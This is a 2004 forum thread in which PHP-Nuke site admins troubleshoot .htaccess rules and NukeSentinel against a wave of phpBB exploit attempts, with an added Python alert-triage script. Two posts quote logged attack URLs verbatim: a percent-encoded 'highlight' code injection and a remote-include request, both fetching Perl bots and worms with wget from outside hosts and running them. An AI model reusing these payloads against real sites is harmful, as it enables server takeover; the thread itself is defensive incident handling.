Author |
Message |
TheosEleos
Life Cycles Becoming CPU Cycles
Joined: Sep 18, 2003
Posts: 960
Location: Missouri
|
Posted:
Fri Dec 24, 2004 9:34 am |
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
Posted:
Fri Dec 24, 2004 9:37 am |
|
|
|
coldblooded
New Member
Joined: Jul 05, 2004
Posts: 11
Location: Right here
|
Posted:
Fri Dec 24, 2004 12:15 pm |
|
They've been hammering on our forums with a combination of highlight and rush scripts, every couple minutes or so, for the last 12 hours from a variety of IPs. Sentinel is easily one of the most important projects for Nuke to come out. |
|
|
|
blarneystone
Client
Joined: Sep 18, 2004
Posts: 62
|
Posted:
Fri Dec 24, 2004 12:34 pm |
|
371 Attack attempts on my site so far TODAY! Sentinel stopped every one.
Thanks for a great utility! |
|
|
|
Raven
|
Posted:
Fri Dec 24, 2004 2:14 pm |
|
Add this line to your .htaccess in the list of bots that you block at the end, so that
RewriteCond %{HTTP_USER_AGENT} ^Zeus
becomes
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ emailsforyou.php [L]
Now you may have a different RewriteRule. |
|
|
|
CurtisH
Life Cycles Becoming CPU Cycles
Joined: Mar 15, 2004
Posts: 638
Location: West Branch, MI
|
Posted:
Fri Dec 24, 2004 3:13 pm |
|
coldblooded wrote: | They've been hammering on our forums with a combination of highlight and rush scripts, every couple minutes or so, for the last 12 hours from a variety of IPs. Sentinel is easily one of the most important projects for Nuke to come out. |
I have had over 100 of these attempts today, different IP each time. Is this the Santy thing or are these individuals?
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.803
Query String: curtishancock.net/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 |
_________________ Those who dream by day are cognizant of many things which escape those who dream only by night. ~Poe |
|
|
Raven
|
Posted:
Fri Dec 24, 2004 3:18 pm |
|
If it's not, it's a carbon copy. It's trying to exploit phpbb so I imagine it is. |
|
|
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
|
Posted:
Sat Dec 25, 2004 6:11 pm |
|
Raven,
I am new to modifying .htaccess. Sentinel is adding the deny's at the end of the file. Do we place the Rewrite commands in front of where Sentinel has started to write the deny statements?
Thanks for the help! Getting concerned with how these guys even found my site. I thought I was careful to keep it out of the search engines. It is strictly a family site. Bummer... wish these guys would put their skills to "good" rather than all this stupid mayhem...
TIA,
montego |
|
|
|
PHrEEkie
Subject Matter Expert
Joined: Feb 23, 2004
Posts: 358
|
Posted:
Sat Dec 25, 2004 7:27 pm |
|
Put it at the top, then a space between it and where Sentinel has started adding IPs. Make sure to have the blank space at the end of the Sentinel bans so that it can continue adding them.
PHrEEk |
_________________ PHP - Breaking your legacy scripts one build at a time. |
|
|
montego
|
Posted:
Sat Dec 25, 2004 8:36 pm |
|
Well, the following is NOT stopping the abuse attempts. I am still getting the emails from Sentinel. Not sure what is wrong. Is there another setting that I may have to turn on in the .htaccess file to get it to work?
Here is what I currently have in my .htaccess file:
Code:
RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ScriptViolation.php [L]
RewriteEngine Off
|
The user agent is showing up as User Agent: LWP::Simple in my Sentinel emails. Does this sound like Apache isn't doing what I am trying to tell it to do?
TIA,
montego |
|
|
|
Raven
|
Posted:
Sat Dec 25, 2004 8:56 pm |
|
Try changing [NC,OR] to [NC, OR] |
|
|
|
PHrEEkie
|
Posted:
Sat Dec 25, 2004 8:59 pm |
|
Apache needs to have mod_rewrite enabled, but that's fairly standard stuff.. can't imagine a host having that disabled, but then again, nothing really surprises me anymore... lol
PHrEEk |
|
|
|
Raven
|
Posted:
Sat Dec 25, 2004 9:05 pm |
|
Great point. I just take that for granted |
|
|
|
montego
|
Posted:
Sun Dec 26, 2004 8:01 am |
|
Does Apache have to be restarted after I change the .htaccess file? I just verified that my Hosting company just upgraded to 4.3.10 PHP (just this morning!) and it does have mod_rewrite module as a loaded module. Does this mean it should be enabled?
Also, strangely enough, after I updated my .htaccess file last night, Sentinel stopped writing IP addresses to it. The "kiddies" are still getting banned but I am losing server-level protection... I don't like that idea. Hence my question about restarting Apache OR if I need to do something in Sentinel to get it to log again?
You guys are great!
montego |
|
|
|
Raven
|
Posted:
Sun Dec 26, 2004 8:25 am |
|
No on restarting Apache. NukeSentinel never sees these now because they are blocked at the server level. |
|
|
|
montego
|
Posted:
Sun Dec 26, 2004 8:29 am |
|
Raven, but I am still getting emails from Sentinel on these exact same abuses... as mentioned in my post. How can this be? |
|
|
|
Raven
|
Posted:
Sun Dec 26, 2004 8:33 am |
|
Since, for some yet unknown reason, the .htaccess code is not working on your site, NukeSentinel is still protecting you. Do you have the .htaccess code at the very top of your .htaccess? |
|
|
|
montego
|
Posted:
Sun Dec 26, 2004 8:38 am |
|
I will PM you with my .htaccess code up to where the IP addresses were getting added. Sorry for being such a pest. It is just so unnerving to have someone going after me and my family! |
|
|
|
Raven
|
Posted:
Sun Dec 26, 2004 8:42 am |
|
Hopefully the changes you mentioned will work! |
|
|
|
montego
|
Posted:
Sun Dec 26, 2004 9:03 am |
|
Uuuuggghhhhh.... they just tried again! I just don't understand why .htaccess is not working as expected. Here is the attack email text:
Code:
Date & Time: 2004-12-26 07:00:22
Blocked IP: 69.44.153.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: LWP::Simple/5.65
Query String:
mysite.com/modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt
Forwarded For: none
Client IP: none
Remote Address: 69.44.153.20
Remote Port: 37526
Request Method: GET
|
Any thoughts? I just cannot see why the .htaccess commands are not working. I am going to have to submit a ticket to my web host!
UUUgggghhhhh |
|
|
|
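Added example (not part of any post in this thread, and not NukeSentinel's own code): a small triage script for alert e-mails like the two quoted above. It percent-decodes the logged query string until it stops changing, then labels the `highlight` injection and the URL passed as `name`. The sample alerts are constructed, with placeholder hosts and a harmless `id` in place of the logged commands; the function names and label strings are this example's own.

```python
import re
from urllib.parse import parse_qsl, unquote

CALL_RE = re.compile(r"\b(passthru|system|exec|shell_exec|popen|eval)\s*\(", re.I)
# Constructed alerts in the thread's e-mail layout: placeholder hosts, harmless "id".
ALERT_HIGHLIGHT = """User Agent: LWP::Simple/5.803
Query String: forum.example/modules.php?name=Forums&rush=id&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527"""
ALERT_INCLUDE = """User Agent: LWP::Simple/5.65
Query String:
site.example/modules.php?name=http://remote.example/x.gif?&cmd=id
Request Method: GET"""

def parse_alert(text):
    """Read 'Key: value' lines; an empty value is taken from the next line."""
    fields, pending = {}, None
    for line in map(str.strip, text.splitlines()):
        m = re.match(r"([A-Za-z &]+):\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2)
            pending = None if m.group(2) else m.group(1)
        elif pending and line:
            fields[pending], pending = line, None
    return fields

def decode_fully(value, limit=5):
    """Percent-decode until stable; return (text, rounds that changed it)."""
    rounds = 0
    while rounds < limit and unquote(value) != value:
        value, rounds = unquote(value), rounds + 1
    return value, rounds

def classify(alert_text):
    fields, findings = parse_alert(alert_text), []
    # Same test as the thread's "RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]".
    if fields.get("User Agent", "").lower().startswith("lwp"):
        findings.append("scripted-client")
    query = fields.get("Query String", "").partition("?")[2]
    for name, value in parse_qsl(query, keep_blank_values=True):  # decodes once
        decoded, extra = decode_fully(value)
        if name == "highlight" and "'" in decoded and CALL_RE.search(decoded):
            findings.append("highlight-code-injection")  # quote + PHP exec call
            if extra:  # the quote only appeared after a second decode (%2527)
                findings.append("double-encoded")
        if name == "name" and re.match(r"(?i)(https?|ftp)://", decoded):
            findings.append("remote-include")  # URL where a module name belongs
    return findings

if __name__ == "__main__":
    for sample in (ALERT_HIGHLIGHT, ALERT_INCLUDE):
        print(classify(sample))
```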
montego
|
Posted:
Sun Dec 26, 2004 9:54 am |
|
Contacted my web hosting company. They made it sound like they had to make a chg to the conf file to enable rewrite! They have done so now, so we'll now see if this blasted code finally works for me.
Sure appreciate everyone's help on this. Such a pain. Hopefully all the work on this recently will help improve many of our skills in addressing these issues ourselves in the future. I have certainly learned a thing or two.
If you do not hear back from me, Raven, then you'll know it is working. So far so good...
montego |
|
|
|
|